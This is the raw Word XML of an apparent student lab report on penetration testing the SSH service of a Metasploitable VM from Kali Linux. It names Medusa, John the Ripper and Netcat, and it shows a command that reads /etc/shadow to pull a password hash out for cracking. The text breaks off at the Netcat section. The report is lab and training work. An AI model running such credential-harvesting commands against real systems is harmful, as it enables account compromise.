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25646" w14:textId="596C9050" w:rsidR="00364313" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="002F3E4E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SSH Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF4DAB" w14:textId="77777777" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374AEC8D" w14:textId="2C21B792" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E544B9" w14:textId="77777777" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This report details the penetration testing performed on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM’s SSH service using Kali Linux. The objective of this test was to identify security weaknesses that could be exploited by an attacker to gain unauthorized access. The tools used, attack methodologies, and recommended remediations are documented below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BB2CB" w14:textId="77777777" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07BFFDE4" w14:textId="376FFDD0" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scope of the Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC338C" w14:textId="31478FE7" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM (IP: 192.168.72.134)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD46626" w14:textId="51A01B95" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service Tested: SSH (Port 22)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217EEE6B" w14:textId="2A9A69A5" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Testing Environment: Controlled lab setup with Kali Linux as the attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54566E7C" w14:textId="77777777" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397EAFE9" w14:textId="2BA0D4CF" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7048E" w14:textId="5CF44F83" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739157C" w14:textId="69D836D2" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Medusa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1398EC6C" w14:textId="03876839" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B794DB" w14:textId="14742A77" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for file transfer verification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281EB6FA" w14:textId="77777777" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DF8DFA" w14:textId="657CFDF2" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hint: In case you might be wondering if I didn’t use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, well I did and that simulation was conducted and reported in my previous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> report where I scanned the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine IP and was greeted with tones of open ports ready to be exploited and one of them was ssh. To access this report kindly check my GitHub Page </w:t>
      </w:r>
      <w:r w:rsidR="00E976C0" w:rsidRPr="00E976C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://github.com/Melvin123-dot/Cybersecurity_Projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81E5DF" w14:textId="5521BEC6" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tools and Attack Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F008D" w14:textId="77777777" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C139E2" w14:textId="02060BAC" w:rsidR="00CF7CD1" w:rsidRPr="002F3E4E" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Before I hint on the tools and the methodologies used, I first began the project by securely entering my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine VM using the already created password which was used to setup the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3687F567" w14:textId="77777777" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2423E885" w14:textId="5F4399BF" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Here’s an image of what happened:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA6D49" w14:textId="77777777" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546816F0" w14:textId="429BF328" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73CC1002" wp14:editId="3CDFB6D6">
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="194069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94818" name="Picture 1940694818"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">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619FEA3A" w14:textId="49379E9F" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57141103" w14:textId="77777777" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4A46B7" w14:textId="11B5F575" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The above image shows the attacker which is me securely connecting to my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM using it’s IP address and the username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60AF82" w14:textId="77777777" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5312CB26" w14:textId="58086050" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After a successful login, I then change the directory to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/shadow file to grab the password hash of my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM to be used to further perform the penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338FF568" w14:textId="77777777" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3949130D" w14:textId="40E28864" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The image below shows the activity that went on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B225852" w14:textId="77777777" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213F2BF4" w14:textId="2088EF00" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40459CA8" wp14:editId="4762E800">
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1891592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92329" name="Picture 1891592329"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">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0D55F8D2" w14:textId="72E8E56A" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_2.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4172B235" w14:textId="77777777" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6848D398" w14:textId="739D42AB" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="007F5568" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The image you see above signifies that after successfully connecting to the target’s VM we then use a command which is </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/shadow | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; hash.txt /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">”.  </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The command entails that the attacker copies the password hash using the username of the target </w:t>
      </w:r>
      <w:r w:rsidR="0069322F" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and saves it to a text file called </w:t>
      </w:r>
      <w:r w:rsidR="0069322F" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">“hash.txt” </w:t>
      </w:r>
      <w:r w:rsidR="0069322F" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and in addition moves the file to the home directory of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0069322F" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0069322F" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine to be moved later to the attackers machine. Hint: The hash.txt file is the one highlighted showing it was successfully created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE8EEDA" w14:textId="77777777" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6536E4BF" w14:textId="56E1078C" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Now let’s discuss the tool used to help retrieve or get the file from the user to the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA8AFC" w14:textId="45358540" w:rsidR="007F5568" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
